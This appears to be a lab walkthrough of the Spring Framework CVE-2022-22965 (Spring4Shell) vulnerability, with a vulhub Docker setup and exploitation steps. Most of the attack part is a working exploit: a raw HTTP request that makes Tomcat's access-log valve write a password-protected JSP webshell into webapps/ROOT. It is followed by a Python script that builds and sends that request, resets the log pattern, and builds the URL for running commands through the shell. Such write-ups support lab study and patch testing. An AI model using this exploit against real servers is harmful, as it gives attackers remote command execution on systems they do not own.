Affected versions
Spring Framework 5.3.x < 5.3.18
Spring Framework 5.2.x < 5.2.20
The request shown below additionally relies on the application running on JDK 9 or later and being deployed as a WAR on Tomcat, since it writes the webshell through Tomcat's access-log valve; a Spring Boot fat jar with embedded Tomcat is not exploitable by this particular payload.
Environment setup
There are currently three ways to set up the environment: build it directly from an old version on the official site, use vulhub, or use vulfocus.
vulhub environment
git clone https://github.com/vulhub/vulhub.git
chmod 777 vulhub   # not actually required; docker-compose only needs read access to the directory
cd vulhub/spring/CVE-2022-22965
docker-compose up -d
Access the target on port 8080 (the port exposed by the vulhub compose file) to confirm the application is up.
payload
GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar1&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
Host: 192.168.0.101:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
suffix: %>//
c1: Runtime
c2: <%
DNT: 1
Content-Length: 0
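To make the request above easier to reason about, here is an added example (not code from the original post or from any public PoC) that builds the same query string and headers, previews the JSP that Tomcat's AccessLogValve will write, and builds the follow-up URL for using the dropped shell. The base URL, the shell file name tomcatwar1, the pwd/cmd parameter names and the password "j" are taken from the request above; the reset request mirrors the clean-up step public PoCs send and is an assumption as to how much it helps. The point the raw request hides is that the JSP body is delivered as the access-log pattern, and `<%`, `Runtime` and `%>` arrive in the c2, c1 and suffix headers because the valve expands `%{name}i` to the value of request header name.

```python
"""CVE-2022-22965 request builder for the Tomcat access-log write shown above.

Added example, not code from the original post or from any public PoC. The base
URL, the shell file name, the "pwd"/"cmd" parameter names and the password "j"
mirror the raw request; everything else is an assumption for illustration.
"""
import re
import urllib.parse
import urllib.request

# Property path of the first valve in the Tomcat host pipeline, reached through
# the Spring data-binding chain class -> module -> classLoader -> resources.
PREFIX = "class.module.classLoader.resources.context.parent.pipeline.first."

# The JSP body is supplied as the access-log *pattern*. AccessLogValve replaces
# %{name}i with request header "name", so '<%', 'Runtime' and '%>' travel in
# headers instead of the query string.
JSP_PATTERN = (
    '%{c2}i if("j".equals(request.getParameter("pwd"))){ '
    'java.io.InputStream in = %{c1}i.getRuntime().exec('
    'request.getParameter("cmd")).getInputStream(); int a = -1; '
    'byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ '
    'out.println(new String(b)); } } %{suffix}i'
)

# Headers consumed by the %{...}i placeholders above.
HEADERS = {"c2": "<%", "c1": "Runtime", "suffix": "%>//"}


def build_params(shell_name="tomcatwar1", directory="webapps/ROOT"):
    """Query parameters that point the valve at <directory>/<shell_name>.jsp.

    fileDateFormat is blanked so no date is inserted between prefix and
    suffix and the resulting file name stays predictable.
    """
    return {
        PREFIX + "pattern": JSP_PATTERN,
        PREFIX + "suffix": ".jsp",
        PREFIX + "directory": directory,
        PREFIX + "prefix": shell_name,
        PREFIX + "fileDateFormat": "",
    }


def reset_params():
    """Follow-up request sent by public PoCs: blank the pattern so later
    requests (which lack the c1/c2/suffix headers and would render them as
    '-') stop appending junk lines to the .jsp."""
    return {PREFIX + "pattern": ""}


def render_log_line(pattern, headers):
    """Simulate the valve's %{name}i substitution to preview the written file.
    A missing header renders as '-', which is what Tomcat emits."""
    return re.sub(r"%\{(\w+)\}i", lambda m: headers.get(m.group(1), "-"), pattern)


def exploit_url(base, params):
    # quote_via=quote encodes spaces as %20, matching the raw request above.
    query = urllib.parse.urlencode(params, quote_via=urllib.parse.quote)
    return base.rstrip("/") + "/?" + query


def shell_url(base, cmd, shell_name="tomcatwar1", pwd="j"):
    """URL that runs `cmd` through the dropped JSP."""
    query = urllib.parse.urlencode({"pwd": pwd, "cmd": cmd})
    return base.rstrip("/") + "/" + shell_name + ".jsp?" + query


def send(base, params, headers=HEADERS, timeout=5):
    """Send one crafted GET and return the HTTP status. Needs a live lab target."""
    req = urllib.request.Request(exploit_url(base, params), headers=headers)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status


if __name__ == "__main__":
    # Preview what lands in webapps/ROOT/tomcatwar1.jsp without touching a target.
    print(render_log_line(JSP_PATTERN, HEADERS))
    print(exploit_url("http://192.168.0.101:8080", build_params()))
```

Running the module prints the rendered JSP and the full exploit URL. Against a lab target, `send(base, build_params())` drops the file, `send(base, reset_params())` stops further appends, and `shell_url(base, "id")` is the URL to fetch for command output. Note that the valve keeps logging every later request into the .jsp until the pattern is reset, which is why a raw one-shot request can leave a file that grows with unrelated traffic.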
Honestly, it has some chance of succeeding, but it is not guaranteed; an analysis will be added later. I would still recommend the vulfocus environment, since I feel the environment may have some issues. As for the payload, you can take the core content from the exp and poc on GitHub and construct it directly.